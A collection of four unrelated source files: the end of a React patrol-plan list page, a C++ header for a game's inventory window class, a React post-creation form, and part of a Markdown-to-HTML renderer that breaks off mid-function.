if (!selectedRows) return;
const onOkf = () => {
dispatch({
type: 'ogpPatrolPlan/remove',
payload: {
ids: selectedRows.map(row => row.planId).join(','),
},
callback: () => {
this.setState({
selectedRows: [],
});
message.info('已成功删除');
this.doSearch();
},
});
};
Modal.confirm({
title: '删除',
content: '确定永久删除选定的记录吗?',
okText: '确定删除',
okType: 'danger',
cancelText: '取消',
onOk: onOkf,
onCancel() {
// console.log('Cancel');
},
});
};
handleSelectRows = rows => {
this.setState({
selectedRows: rows,
});
};
doSearch = () => {
const { dispatch, form } = this.props;
form.validateFields((err, fieldsValue) => {
if (err) return;
const values = {
...fieldsValue,
le_createTime: fieldsValue.le_createTime && fieldsValue.le_createTime.format('YYYY-MM-DD HH:mm:ss'),
ge_createTime: fieldsValue.ge_createTime && fieldsValue.ge_createTime.format('YYYY-MM-DD HH:mm:ss'),
};
// console.log(values)
this.setState({
formValues: values,
});
dispatch({
type: 'ogpPatrolPlan/fetch',
payload: values,
});
});
};
handleSearch = e => {
e.preventDefault();
this.doSearch();
};
handleShow = (e, key) => {
const { dispatch } = this.props;
dispatch(routerRedux.push(`/opm/ogpPatrolPlan-profile/${key}`));
};
handleAdd = () => {
const { dispatch } = this.props;
dispatch(routerRedux.push(`/opm/ogpPatrolPlan-form/add/0`));
};
handleEdit = (e, key) => {
const { dispatch } = this.props;
dispatch(routerRedux.push(`/opm/ogpPatrolPlan-form/edit/${key}`));
};
renderAdvancedForm() {
const { dictionary, form } = this.props;
const { getFieldDecorator } = form;
return (
<Form onSubmit={this.handleSearch} layout="inline">
<Row gutter={{ md: 8, lg: 24, xl: 48 }}>
<Col md={6} sm={24}>
<FormItem label="计划名称">
{getFieldDecorator('like_planName')(<Input placeholder="请输入计划名称" />)}
</FormItem>
</Col>
<Col md={6} sm={24}>
<FormItem label="创建人员">
{getFieldDecorator('like_createPerson')(<Input placeholder="请输入创建人员" />)}
</FormItem>
</Col>
<Col md={7} sm={24}>
<FormItem label="创建时间">
{getFieldDecorator('le_createTime')(
<RangePicker placeholder={['开始日期', '结束日期']} />
)}
</FormItem>
</Col>
<div style={{ overflow: 'hidden' }}>
<Button icon="search" type="primary" htmlType="submit">
查询
</Button>
<Button icon="reload" style={{ marginLeft: 8 }} onClick={this.handleFormReset}>
重置
</Button>
</div>
</Row>
</Form>
);
}
renderForm() {
return this.renderAdvancedForm();
}
render() {
const { ogpPatrolPlan: { data, domain }, dictionary, loading } = this.props;
const { selectedRows } = this.state;
const columns = [
{
title: '计划编号',
dataIndex: 'planId',
},
{
title: '计划名称',
dataIndex: 'planName',
},
{
title: '创建人员',
dataIndex: 'createPerson',
},
{
title: '创建时间',
dataIndex: 'createTime',
},
{
title: '操作',
render: (text, record) => (
<Fragment>
<a onClick={e => this.handleEdit(e, record.planId)}>编辑</a>
<Divider type="vertical" />
<a onClick={e => this.handleShow(e, record.planId)}>查看</a>
</Fragment>
),
},
];
return (
<PageHeaderLayout>
<Card bordered={false}>
<div className={styles.tableList}>
<div className={styles.tableListForm}>{this.renderForm()}</div>
<div className={styles.tableListOperator}>
<Button type="dashed" style={{ width: '100%', marginBottom: 10 }} icon="plus" onClick={this.handleAdd}>
新建任务
</Button>
{selectedRows.length > 0 && (
<span>
<Button icon="minus" type="danger" style={{ marginBottom: 10, marginTop: 10 }} onClick={this.handleRemove}>
删除
</Button>
</span>
)}
</div>
<StandardTable
selectedRows={selectedRows}
loading={loading}
data={data}
columns={columns}
onSelectRow={this.handleSelectRows}
onChange={this.handleStandardTableChange}
rowKey="planId"
/>
</div>
</Card>
</PageHeaderLayout>
);
}
}
|
// Window.h
// Interfaces to the cWindow class representing a UI window for a specific block
#pragma once
#include "../FunctionRef.h"
#include "../ItemGrid.h"
class cPlayer;
class cWindowOwner;
class cClientHandle;
class cBrewingstandEntity;
class cChestEntity;
class cEnderChestEntity;
class cFurnaceEntity;
class cHopperEntity;
class cMinecartWithChest;
class cBeaconEntity;
class cSlotArea;
class cSlotAreaAnvil;
class cWorld;
// Players currently viewing a window.
typedef std::list<cPlayer *> cPlayerList;
// The slot areas composing a window, in slot order.
typedef std::vector<cSlotArea *> cSlotAreas;

// Callback types used when iterating a window's players / client handles.
using cPlayerListCallback = cFunctionRef<bool(cPlayer &)>;
using cClientHandleCallback = cFunctionRef<bool(cClientHandle &)>;
// tolua_begin

/**
Represents a UI window.
Each window has a list of players that are currently using it
When there's no player using a window, it is destroyed.
A window consists of several areas of slots with similar functionality - for example the crafting grid area, or
the inventory area. Each area knows what its slots are (GetSlot() function) and can handle mouse clicks.
The window acts only as a top-level container for those areas, redirecting the click events to the correct areas.
Inventory painting, introduced in 1.5, is handled by the window, too
*/
class cWindow
{
public:
	// Numeric window types as sent over the network protocol:
	enum WindowType
	{
		wtInventory = -1,  // This value is never actually sent to a client
		wtChest = 0,
		wtWorkbench = 1,
		wtFurnace = 2,
		wtDropSpenser = 3,  // Dropper or Dispenser
		wtEnchantment = 4,
		wtBrewery = 5,
		wtNPCTrade = 6,
		wtBeacon = 7,
		wtAnvil = 8,
		wtHopper = 9,
		wtDropper = 10,
		wtAnimalChest = 11,
	};

	// tolua_end

	// Number of slots in the player inventory portion appended to every window
	// (main inventory + hotbar).
	static const int c_NumInventorySlots = 36;

	cWindow(WindowType a_WindowType, const AString & a_WindowTitle);
	virtual ~cWindow();

	char GetWindowID(void) const { return m_WindowID; }  // tolua_export
	int GetWindowType(void) const { return m_WindowType; }  // tolua_export

	/** Returns the textual representation of the window's type, such as "minecraft:chest". */
	const AString GetWindowTypeName(void) const;  // tolua_export

	// The owner is the block entity (or similar) that this window displays; may be nullptr.
	cWindowOwner * GetOwner(void) { return m_Owner; }
	void SetOwner( cWindowOwner * a_Owner) { m_Owner = a_Owner; }

	/** Returns the total number of slots */
	int GetNumSlots(void) const;

	/** Returns the number of slots, excluding the player's inventory (used for network protocols) */
	int GetNumNonInventorySlots(void) const { return GetNumSlots() - c_NumInventorySlots; }

	// tolua_begin

	/** Returns the item at the specified slot for the specified player. Returns nullptr if invalid SlotNum requested */
	const cItem * GetSlot(cPlayer & a_Player, int a_SlotNum) const;

	/** Sets the item to the specified slot for the specified player */
	void SetSlot(cPlayer & a_Player, int a_SlotNum, const cItem & a_Item);

	/** Returns true if the specified slot is in the Player Main Inventory slotarea */
	bool IsSlotInPlayerMainInventory(int a_SlotNum) const;

	/** Returns true if the specified slot is in the Player Hotbar slotarea */
	bool IsSlotInPlayerHotbar(int a_SlotNum) const;

	/** Returns true if the specified slot is in the Player Main Inventory or Hotbar slotareas. Note that returns false for Armor. */
	bool IsSlotInPlayerInventory(int a_SlotNum) const;

	// tolua_end

	/** Fills a_Slots with the slots read from m_SlotAreas[], for the specified player */
	void GetSlots(cPlayer & a_Player, cItems & a_Slots) const;

	/** Handles a click event from a player */
	virtual void Clicked(
		cPlayer & a_Player, int a_WindowID,
		short a_SlotNum, eClickAction a_ClickAction,
		const cItem & a_ClickedItem
	);

	virtual void OpenedByPlayer(cPlayer & a_Player);

	/** Called when a player closes this window; notifies all slot areas. Returns true if close accepted */
	virtual bool ClosedByPlayer(cPlayer & a_Player, bool a_CanRefuse);

	/** Sends the specified slot's contents to all clients of this window; the slot is specified as local in an area */
	void BroadcastSlot(cSlotArea * a_Area, int a_LocalSlotNum);

	/** Sends the contents of the whole window to the specified client */
	void SendWholeWindow(cClientHandle & a_Client);

	/** Sends the contents of the whole window to all clients of this window. */
	void BroadcastWholeWindow(void);

	// tolua_begin

	const AString & GetWindowTitle() const { return m_WindowTitle; }
	void SetWindowTitle(const AString & a_WindowTitle) { m_WindowTitle = a_WindowTitle; }

	/** Updates a numerical property associated with the window. Typically used for furnace progressbars.
	Sends the UpdateWindowProperty packet to all clients of the window */
	virtual void SetProperty(short a_Property, short a_Value);

	/** Updates a numerical property associated with the window. Typically used for furnace progressbars.
	Sends the UpdateWindowProperty packet only to the specified player */
	virtual void SetProperty(short a_Property, short a_Value, cPlayer & a_Player);

	// tolua_end

	// Called by the owner when it is destroyed, so the window can detach itself.
	void OwnerDestroyed(void);

	/** Calls the callback safely for each player that has this window open; returns true if all players have been enumerated */
	bool ForEachPlayer(cPlayerListCallback a_Callback);

	/** Calls the callback safely for each client that has this window open; returns true if all clients have been enumerated */
	bool ForEachClient(cClientHandleCallback a_Callback);

	/** Called on shift-clicking to distribute the stack into other areas; Modifies a_ItemStack as it is distributed!
	if a_ShouldApply is true, the changes are written into the slots;
	if a_ShouldApply is false, only a_ItemStack is modified to reflect the number of fits (for fit-testing purposes) */
	virtual void DistributeStack(cItem & a_ItemStack, int a_Slot, cPlayer & a_Player, cSlotArea * a_ClickedArea, bool a_ShouldApply) = 0;

	/** Called from DistributeStack() to distribute the stack into a_AreasInOrder; Modifies a_ItemStack as it is distributed!
	If a_ShouldApply is true, the changes are written into the slots;
	if a_ShouldApply is false, only a_ItemStack is modified to reflect the number of fits (for fit-testing purposes)
	If a_BackFill is true, the areas will be filled from the back (right side). (Example: Empty Hotbar -> Item get in slot 8, not slot 0) */
	void DistributeStackToAreas(cItem & a_ItemStack, cPlayer & a_Player, cSlotAreas & a_AreasInOrder, bool a_ShouldApply, bool a_BackFill);

	/** Called on DblClicking to collect all stackable items from all areas into hand.
	The items are accumulated in a_Dragging and removed from the SlotAreas immediately.
	If a_CollectFullStacks is false, slots with full stacks in the area are skipped while collecting.
	Returns true if full stack has been collected, false if there's space remaining to fill. */
	bool CollectItemsToHand(cItem & a_Dragging, cSlotArea & a_Area, cPlayer & a_Player, bool a_CollectFullStacks);

	/** Used by cSlotAreas to send individual slots to clients, a_RelativeSlotNum is the slot number relative to a_SlotArea */
	void SendSlot(cPlayer & a_Player, cSlotArea * a_SlotArea, int a_RelativeSlotNum);

protected:
	cSlotAreas m_SlotAreas;     // The slot areas that make up this window, in the order their slots are numbered
	char m_WindowID;            // Unique (per client) ID assigned from m_WindowIDCounter
	int m_WindowType;           // One of the WindowType values
	AString m_WindowTitle;

	cCriticalSection m_CS;      // Protects m_OpenedBy against multithreaded access
	cPlayerList m_OpenedBy;     // Players that currently have this window open

	bool m_IsDestroyed;
	cWindowOwner * m_Owner;     // The entity / block entity that owns this window; may be nullptr

	static Byte m_WindowIDCounter;  // Source of new window IDs; shared across all windows

	/** Sets the internal flag as "destroyed"; notifies the owner that the window is destroying */
	virtual void Destroy(void);

	/** Returns the correct slot area for the specified window-global SlotNum
	Also returns the area-local SlotNum corresponding to the GlobalSlotNum
	If the global SlotNum is out of range, returns nullptr */
	cSlotArea * GetSlotArea(int a_GlobalSlotNum, int & a_LocalSlotNum);

	/** Returns the correct slot area for the specified window-global SlotNum
	Also returns the area-local SlotNum corresponding to the GlobalSlotNum
	If the global SlotNum is out of range, returns nullptr.
	Const version. */
	const cSlotArea * GetSlotArea(int a_GlobalSlotNum, int & a_LocalSlotNum) const;

	/** Prepares the internal structures for inventory painting from the specified player */
	void OnPaintBegin(cPlayer & a_Player);

	/** Adds the slot to the internal structures for inventory painting by the specified player */
	void OnPaintProgress(cPlayer & a_Player, int a_SlotNum);

	/** Processes the entire action stored in the internal structures for inventory painting; distributes as many items as possible */
	void OnLeftPaintEnd(cPlayer & a_Player);

	/** Processes the entire action stored in the internal structures for inventory painting; distributes one item into each slot */
	void OnRightPaintEnd(cPlayer & a_Player);

	/** Processes the entire action stored in the internal structures for inventory painting; distributes a full stack into each slot */
	void OnMiddlePaintEnd(cPlayer & a_Player);

	/** Distributes a_NumToEachSlot items into the slots specified in a_SlotNums; returns the total number of items distributed.
	@param a_LimitItems if false, no checks are performed on a_Item.m_ItemCount. */
	int DistributeItemToSlots(cPlayer & a_Player, const cItem & a_Item, int a_NumToEachSlot, const cSlotNums & a_SlotNums, bool a_LimitItems = true);
} ;  // tolua_export
|
import React, { useState } from "react";
import axios from "axios";
import filterOptions from "../assets/data/filterOptions";
import createPostSettings from "../assets//data/createPostSettings";
import CustomModal from "../components/CreatePost/CustomModal";
import RadioGroup from "../components/CreatePost/RadioGroup";
import CustomH1 from "../components/Typography/Title/CustomH1";
import DownArrowButton from "../components/Button/DownArrowButton";
import HorizontalLine from "../components/Icon/horizontal-line";
import AddTags from "../components/Tag/AddTags";
import SubmitButton from "../components/Button/SubmitButton";
import { theme } from "../constants/theme";
import {
CreatePostWrapper,
StyledForm,
StyledInput,
StyledTextArea,
} from "../components/CreatePost/StyledCreatePost";
// Tag options for the post.
// NOTE(review): assumes the third entry of filterOptions is the post-type
// filter — confirm against assets/data/filterOptions.
const types = Object.values(filterOptions)[2].options;

// Modal-driven settings (each has .type, .title, .options, .default).
const { shareWith, expires, helpTypes } = createPostSettings;

// Initial values for the three useState hooks below.
const initialState = {
  // Modal UI state: visibility, the options to display, and which setting
  // ("shareWith" / "expires") is currently being edited.
  state: {
    modal: false,
    options: [],
    selected: "",
  },
  // The post being composed.
  formData: {
    title: "",
    description: "",
    tags: [],
    shareWith: shareWith.default.value,
    expires: expires.default.value,
    help: helpTypes.default.value,
  },
  // Names of formData fields currently failing validation.
  errors: [],
};

// Validation message per formData field; the keys double as the list of
// required fields.
const errorMsg = {
  title: "Please include a title for your post.",
  description: "Please include a description for your post.",
  help: "Please select a type of help.",
  tags: "Please add at least one tag.",
};
export default (props) => {
const [state, setState] = useState(initialState.state);
const [formData, setFormData] = useState(initialState.formData);
const [errors, setErrors] = useState(initialState.errors);
const { modal, selected, options } = state;
const showModal = (setting) => (e) => {
setState({
...state,
modal: !state.modal,
options: setting.options,
selected: setting.type,
});
};
const closeModal = (e) => {
setState({
...state,
modal: !state.modal,
options: [],
selected: "",
});
};
const handleFormData = (field) => (e) => {
setFormData({ ...formData, [field]: e.target.value });
if (errors.includes(field) && formData[field]) {
const newErrors = errors.filter((error) => error !== field);
setErrors(newErrors);
}
};
const addTag = (tag) => (e) => {
const hasTag = formData.tags.includes(tag);
if (hasTag) {
const tags = formData.tags.filter((t) => t !== tag);
setFormData({ ...formData, tags });
} else {
setFormData({ ...formData, tags: [...formData.tags, tag] });
}
};
const populateErrors = () => {
const newErrors = [];
for (let field in errorMsg) {
if (!errors.includes(field)) {
newErrors.push(field);
}
}
setErrors([...errors, ...newErrors]);
};
const renderError = (field) => {
if (errors.includes(field) && (!formData[field] || !formData[field].length))
return errorMsg[field];
};
const handleSubmit = async (e) => {
e.preventDefault();
populateErrors();
if (!errors.length) {
// todo: finish integrating api
try {
const req = await axios.post("/api/posts", formData);
} catch (error) {
console.log(error);
}
}
};
return (
<CreatePostWrapper>
<CustomH1
className="title"
fontsize="2.2rem"
fontweight="700"
color="black"
>
Create a Post
</CustomH1>
<StyledForm onSubmit={handleSubmit}>
<div className="settings">
<CustomModal
title={selected ? createPostSettings[selected].title : ""}
className="post-modal"
content={
<RadioGroup
flex={true}
padding="1.3rem 0"
onChange={handleFormData(selected)}
options={options}
value={formData[selected]}
defaultValue={formData[selected]}
/>
}
onClose={closeModal}
visible={modal}
closable={false}
/>
<div className="buttons">
<DownArrowButton
handleClick={showModal(shareWith)}
label={formData.shareWith}
color={theme.colors.royalBlue}
bgcolor="#fff"
long="true"
/>
<DownArrowButton
handleClick={showModal(expires)}
label={formData.expires}
color={theme.colors.royalBlue}
bgcolor="#fff"
long="true"
/>
</div>
<div className="inline">
<RadioGroup
onChange={handleFormData("help")}
options={helpTypes.options}
value={formData.help}
padding="0"
/>
<span className="error-box">{renderError("help")}</span>
</div>
</div>
<HorizontalLine />
<div className="post-content">
<label>
<StyledInput
onChange={handleFormData("title")}
value={formData.title}
placeholder="Title"
className="title"
/>
</label>
<span className="error-box">{renderError("title")}</span>
<label>
<StyledTextArea
onChange={handleFormData("description")}
value={formData.description}
placeholder="Write a post."
rows={12}
/>
</label>
<span className="error-box">{renderError("description")}</span>
</div>
<HorizontalLine />
<div className="tags">
<AddTags addTag={addTag} filters={types} />
</div>
<span className="error-box">{renderError("tags")}</span>
<SubmitButton
title="Post"
handleClick={handleSubmit}
className="submit-btn"
/>
</StyledForm>
</CreatePostWrapper>
);
};
|
const MarkdownIt = require('markdown-it');
const Entities = require('html-entities').AllHtmlEntities;
const htmlentities = (new Entities()).encode;
const Resource = require('lib/models/Resource.js');
const ObjectUtils = require('lib/ObjectUtils');
const { shim } = require('lib/shim.js');
const { _ } = require('lib/locale');
const md5 = require('md5');
const MdToHtml_Katex = require('lib/MdToHtml_Katex');
const StringUtils = require('lib/string-utils.js');
/**
 * Renders a Markdown note body to a self-contained HTML string (inline CSS,
 * resource-aware image/link handling, Katex support and a clickable-checkbox
 * hack). Rendered output is cached per (resources, body, style, options) key.
 */
class MdToHtml {
	constructor(options = null) {
		if (!options) options = {};
		// Resources (images, attachments) keyed by resource ID. An entry set to
		// an empty object means "currently being loaded" (see loadResource()).
		this.loadedResources_ = {};
		// Cached rendered HTML and the key it was computed for.
		this.cachedContent_ = null;
		this.cachedContentKey_ = null;
		// Must include last "/"
		this.resourceBaseUrl_ = ('resourceBaseUrl' in options) ? options.resourceBaseUrl : null;
	}

	// Builds the cache key from the loaded resource IDs plus hashes of the
	// body, style and options, so cached HTML is reused only when nothing
	// relevant has changed.
	makeContentKey(resources, body, style, options) {
		let k = [];
		for (let n in resources) {
			if (!resources.hasOwnProperty(n)) continue;
			const r = resources[n];
			k.push(r.id);
		}
		k.push(md5(escape(body))); // https://github.com/pvorb/node-md5/issues/41
		k.push(md5(JSON.stringify(style)));
		k.push(md5(JSON.stringify(options)));
		return k.join('_');
	}

	// Invalidates the render cache; the next render() call recomputes.
	clearCache() {
		this.cachedContent_ = null;
		this.cachedContentKey_ = null;
	}

	// Serializes a markdown-it attrs array ([[name, value], ...]) into an HTML
	// attribute string, entity-encoding values. Empty "alt" attributes are
	// dropped; "src" is always encoded.
	renderAttrs_(attrs) {
		if (!attrs) return '';
		let output = [];
		for (let i = 0; i < attrs.length; i++) {
			const n = attrs[i][0];
			const v = attrs[i].length >= 2 ? attrs[i][1] : null;
			if (n === 'alt' && !v) {
				continue;
			} else if (n === 'src') {
				output.push('src="' + htmlentities(v) + '"');
			} else {
				output.push(n + '="' + (v ? htmlentities(v) : '') + '"');
			}
		}
		return output.join(' ');
	}

	// Returns the value of the named attribute from a markdown-it attrs array,
	// or defaultValue if absent.
	getAttr_(attrs, name, defaultValue = null) {
		for (let i = 0; i < attrs.length; i++) {
			if (attrs[i][0] === name) return attrs[i].length > 1 ? attrs[i][1] : null;
		}
		return defaultValue;
	}

	// Sets (or appends) the named attribute in a markdown-it attrs array.
	// Mutates and returns the same array.
	setAttr_(attrs, name, value) {
		for (let i = 0; i < attrs.length; i++) {
			if (attrs[i][0] === name) {
				attrs[i][1] = value;
				return attrs;
			}
		}
		attrs.push([name, value]);
		return attrs;
	}

	// Loads a resource by ID into this.loadedResources_ and fires
	// options.onResourceLoaded (if provided) so the caller can re-render.
	async loadResource(id, options) {
		// Initially set to to an empty object to make
		// it clear that it is being loaded. Otherwise
		// it sometimes results in multiple calls to
		// loadResource() for the same resource.
		this.loadedResources_[id] = {};

		const resource = await Resource.load(id);
		if (!resource) {
			// Can happen for example if an image is attached to a note, but the resource hasn't
			// been downloaded from the sync target yet.
			console.info('Cannot load resource: ' + id);
			delete this.loadedResources_[id];
			return;
		}

		const localState = await Resource.localState(resource);
		if (localState.fetch_status !== Resource.FETCH_STATUS_DONE) {
			delete this.loadedResources_[id];
			console.info('Resource not yet fetched: ' + id);
			return;
		}

		this.loadedResources_[id] = resource;
		if (options.onResourceLoaded) options.onResourceLoaded();
	}

	// Renders a markdown image token to an <img> tag. Non-resource URLs pass
	// through; resource URLs resolve to local files once loaded (an empty
	// string is returned while the resource load is in flight).
	renderImage_(attrs, options) {
		const title = this.getAttr_(attrs, 'title');
		const href = this.getAttr_(attrs, 'src');

		if (!Resource.isResourceUrl(href)) {
			return '<img data-from-md title="' + htmlentities(title) + '" src="' + href + '"/>';
		}

		const resourceId = Resource.urlToId(href);
		const resource = this.loadedResources_[resourceId];
		if (!resource) {
			// Kick off an async load; caller re-renders via onResourceLoaded.
			this.loadResource(resourceId, options);
			return '';
		}

		if (!resource.id) return ''; // Resource is being loaded

		const mime = resource.mime ? resource.mime.toLowerCase() : '';
		if (Resource.isSupportedImageMimeType(mime)) {
			let src = './' + Resource.filename(resource);
			if (this.resourceBaseUrl_ !== null) src = this.resourceBaseUrl_ + src;
			let output = '<img data-from-md data-resource-id="' + resource.id + '" title="' + htmlentities(title) + '" src="' + src + '"/>';
			return output;
		}

		// Not a displayable image - fall back to a textual placeholder.
		return '[Image: ' + htmlentities(resource.title) + ' (' + htmlentities(mime) + ')]';
	}

	// Same resolution as renderImage_(), but for raw <img> tags found in HTML
	// content (before/after are the attribute strings around src).
	renderImageHtml_(before, src, after, options) {
		const resourceId = Resource.urlToId(src);
		const resource = this.loadedResources_[resourceId];
		if (!resource) {
			this.loadResource(resourceId, options);
			return '';
		}

		if (!resource.id) return ''; // Resource is being loaded

		const mime = resource.mime ? resource.mime.toLowerCase() : '';
		if (Resource.isSupportedImageMimeType(mime)) {
			let newSrc = './' + Resource.filename(resource);
			if (this.resourceBaseUrl_ !== null) newSrc = this.resourceBaseUrl_ + newSrc;
			let output = '<img ' + before + ' data-resource-id="' + resource.id + '" src="' + newSrc + '" ' + after + '/>';
			return output;
		}

		return '[Image: ' + htmlentities(resource.title) + ' (' + htmlentities(mime) + ')]';
	}

	// Renders the opening <a> tag. Resource links get a joplin:// href and an
	// icon; clicks are routed through options.postMessageSyntax so the host
	// app can intercept them.
	renderOpenLink_(attrs, options) {
		let href = this.getAttr_(attrs, 'href');
		const text = this.getAttr_(attrs, 'text');
		const isResourceUrl = Resource.isResourceUrl(href);
		const title = isResourceUrl ? this.getAttr_(attrs, 'title') : href;

		let resourceIdAttr = "";
		let icon = "";
		let hrefAttr = '#';
		if (isResourceUrl) {
			const resourceId = Resource.pathToId(href);
			href = "joplin://" + resourceId;
			resourceIdAttr = "data-resource-id='" + resourceId + "'";
			icon = '<span class="resource-icon"></span>';
		} else {
			// If the link is a plain URL (as opposed to a resource link), set the href to the actual
			// link. This allows the link to be exported too when exporting to PDF.
			hrefAttr = href;
		}
		const js = options.postMessageSyntax + "(" + JSON.stringify(href) + "); return false;";
		let output = "<a data-from-md " + resourceIdAttr + " title='" + htmlentities(title) + "' href='" + hrefAttr + "' onclick='" + js + "'>" + icon;
		return output;
	}

	// Closing counterpart of renderOpenLink_().
	renderCloseLink_(attrs, options) {
		return '</a>';
	}

	// Returns the renderer plugin for a language (currently only "katex"), or
	// null. Plugins are created lazily on first use.
	rendererPlugin_(language) {
		if (!language) return null;

		if (!this.rendererPlugins_) {
			this.rendererPlugins_ = {};
			this.rendererPlugins_['katex'] = new MdToHtml_Katex();
		}

		return language in this.rendererPlugins_ ? this.rendererPlugins_[language] : null;
	}

	// Parses the "{.lang}" prefix convention in inline code, e.g.
	// `{.katex}x^2` => { language: 'katex', newContent: 'x^2' }. Returns null
	// if the content has no such prefix.
	parseInlineCodeLanguage_(content) {
		const m = content.match(/^\{\.([a-zA-Z0-9]+)\}/);
		if (m && m.length >= 2) {
			const language = m[1];
			return {
				language: language,
				newContent: content.substr(language.length + 3),
			};
		}
		return null;
	}

	// URL-decodes a string, treating "+" as a space; returns the input
	// unchanged if it is not valid percent-encoding.
	urldecode_(str) {
		try {
			return decodeURIComponent((str+'').replace(/\+/g, '%20'));
		} catch (error) {
			// decodeURIComponent can throw if the string contains non-encoded data (for example "100%")
			// so in this case just return the non encoded string.
			return str;
		}
	}

	// Core renderer: walks the markdown-it token stream (recursing into child
	// tokens) and emits HTML strings. Any CSS contributed by renderer plugins
	// is prepended in a <style> block.
	renderTokens_(markdownIt, tokens, options) {
		let output = [];
		// NOTE(review): previousToken is assigned at the end of the loop but
		// never read - appears to be leftover state.
		let previousToken = null;
		let anchorAttrs = [];
		let extraCssBlocks = {};
		let anchorHrefs = [];
		for (let i = 0; i < tokens.length; i++) {
			let t = tokens[i];
			// NOTE(review): the guard is always true (i < tokens.length inside the
			// loop); tokens[i+1] is undefined (not null) on the last iteration,
			// which the li/p lookahead below tolerates.
			const nextToken = i < tokens.length ? tokens[i+1] : null;

			let tag = t.tag;
			let openTag = null;
			let closeTag = null;
			let attrs = t.attrs ? t.attrs : [];
			let tokenContent = t.content ? t.content : '';
			const isCodeBlock = tag === 'code' && t.block;
			const isInlineCode = t.type === 'code_inline';
			const codeBlockLanguage = t && t.info ? t.info : null;
			let rendererPlugin = null;
			let rendererPluginOptions = { tagType: 'inline' };
			let linkHref = null;

			if (isCodeBlock) rendererPlugin = this.rendererPlugin_(codeBlockLanguage);

			// Determine which tag (if any) to open for this token.
			if (isInlineCode) {
				openTag = null;
			} else if (tag && (t.type.indexOf('html_inline') >= 0 || t.type.indexOf('html_block') >= 0)) {
				openTag = null;
			} else if (tag && t.type.indexOf('_open') >= 0) {
				openTag = tag;
			} else if (tag && t.type.indexOf('_close') >= 0) {
				closeTag = tag;
			} else if (tag && t.type.indexOf('inline') >= 0) {
				openTag = tag;
			} else if (t.type === 'link_open') {
				openTag = 'a';
			} else if (isCodeBlock) {
				if (rendererPlugin) {
					openTag = null;
				} else {
					openTag = 'pre';
				}
			}

			if (openTag) {
				if (openTag === 'a') {
					// Track anchor attrs so the matching close tag can see them.
					anchorAttrs.push(attrs);
					anchorHrefs.push(this.getAttr_(attrs, 'href'));
					output.push(this.renderOpenLink_(attrs, options));
				} else {
					const attrsHtml = this.renderAttrs_(attrs);
					output.push('<' + openTag + (attrsHtml ? ' ' + attrsHtml : '') + '>');
				}
			}

			if (isCodeBlock) {
				const codeAttrs = ['code'];
				if (!rendererPlugin) {
					if (codeBlockLanguage) codeAttrs.push(t.info); // t.info contains the language when the token is a codeblock
					output.push('<code class="' + codeAttrs.join(' ') + '">');
				}
			} else if (isInlineCode) {
				const result = this.parseInlineCodeLanguage_(tokenContent);
				if (result) {
					rendererPlugin = this.rendererPlugin_(result.language);
					tokenContent = result.newContent;
				}

				if (!rendererPlugin) {
					output.push('<code class="inline-code">');
				}
			}

			// markdown-it-katex emits math_inline / math_block tokens; route
			// them to the Katex plugin.
			if (t.type === 'math_inline' || t.type === 'math_block') {
				rendererPlugin = this.rendererPlugin_('katex');
				rendererPluginOptions = { tagType: t.type === 'math_block' ? 'block' : 'inline' };
			}

			if (rendererPlugin) {
				// Fire-and-forget asset loading; failures are only logged.
				rendererPlugin.loadAssets().catch((error) => {
					console.warn('MdToHtml: Error loading assets for ' + rendererPlugin.name() + ': ', error.message);
				});
			}

			if (t.type === 'image') {
				if (tokenContent) attrs.push(['title', tokenContent]);
				output.push(this.renderImage_(attrs, options));
			} else if (t.type === 'html_inline' || t.type === 'html_block') {
				// Raw HTML passes through untouched here (sanitised later in render()).
				output.push(t.content);
			} else if (t.type === 'softbreak') {
				output.push('<br/>');
			} else if (t.type === 'hardbreak') {
				output.push('<br/>');
			} else if (t.type === 'hr') {
				output.push('<hr/>');
			} else {
				if (t.children) {
					// Recurse into inline children (e.g. the content of a paragraph).
					const parsedChildren = this.renderTokens_(markdownIt, t.children, options);
					output = output.concat(parsedChildren);
				} else {
					if (tokenContent) {
						if ((isCodeBlock || isInlineCode) && rendererPlugin) {
							output = rendererPlugin.processContent(output, tokenContent, isCodeBlock ? 'block' : 'inline');
						} else if (rendererPlugin) {
							output = rendererPlugin.processContent(output, tokenContent, rendererPluginOptions.tagType);
						} else {
							output.push(htmlentities(tokenContent));
						}
					}
				}
			}

			// Determine which tag (if any) to close for this token.
			if (nextToken && nextToken.tag === 'li' && t.tag === 'p') {
				// Don't close the <p> of a loose list item right before the next <li>.
				closeTag = null;
			} else if (t.type === 'link_close') {
				closeTag = 'a';
			} else if (tag && t.type.indexOf('inline') >= 0) {
				closeTag = openTag;
			} else if (isCodeBlock) {
				if (!rendererPlugin) closeTag = openTag;
			}

			if (isCodeBlock) {
				if (!rendererPlugin) {
					output.push('</code>');
				}
			} else if (isInlineCode) {
				if (!rendererPlugin) {
					output.push('</code>');
				}
			}

			if (closeTag) {
				if (closeTag === 'a') {
					const currentAnchorAttrs = anchorAttrs.pop();

					// NOTE: Disabled for now due to this:
					// https://github.com/laurent22/joplin/issues/318#issuecomment-375854848
					// const previousContent = output.length ? output[output.length - 1].trim() : '';
					// const anchorHref = this.getAttr_(currentAnchorAttrs, 'href', '').trim();

					// Optimisation: If the content of the anchor is the same as the URL, we replace the content
					// by (Link). This is to shorten the text, which is important especially when the note comes
					// from imported HTML, which can contain many such links and make the text unreadble. An example
					// would be a movie review that has multiple links to allow a user to rate the film from 1 to 5 stars.
					// In the original page, it might be rendered as stars, via CSS, but in the imported note it would look like this:
					// http://example.com/rate/1 http://example.com/rate/2 http://example.com/rate/3
					// http://example.com/rate/4 http://example.com/rate/5
					// which would take a lot of screen space even though it doesn't matter since the user is unlikely
					// to rate the film from the note. This is actually a nice example, still readable, but there is way
					// worse that this in notes that come from web-clipped content.
					// With this change, the links will still be preserved but displayed like
					// (link) (link) (link) (link) (link)
					// if (this.urldecode_(previousContent) === htmlentities(this.urldecode_(anchorHref))) {
					// 	output.pop();
					// 	output.push(_('(Link)'));
					// }

					output.push(this.renderCloseLink_(currentAnchorAttrs, options));
				} else {
					output.push('</' + closeTag + '>');
				}
			}

			// Collect any extra CSS the plugin needs (e.g. Katex stylesheet).
			if (rendererPlugin) {
				const extraCss = rendererPlugin.extraCss();
				const name = rendererPlugin.name();
				if (extraCss && !(name in extraCssBlocks)) {
					extraCssBlocks[name] = extraCss;
				}
			}

			previousToken = t;
		}

		// Insert the extra CSS at the top of the HTML
		if (!ObjectUtils.isEmpty(extraCssBlocks)) {
			const temp = ['<style>'];
			for (let n in extraCssBlocks) {
				if (!extraCssBlocks.hasOwnProperty(n)) continue;
				temp.push(extraCssBlocks[n]);
			}
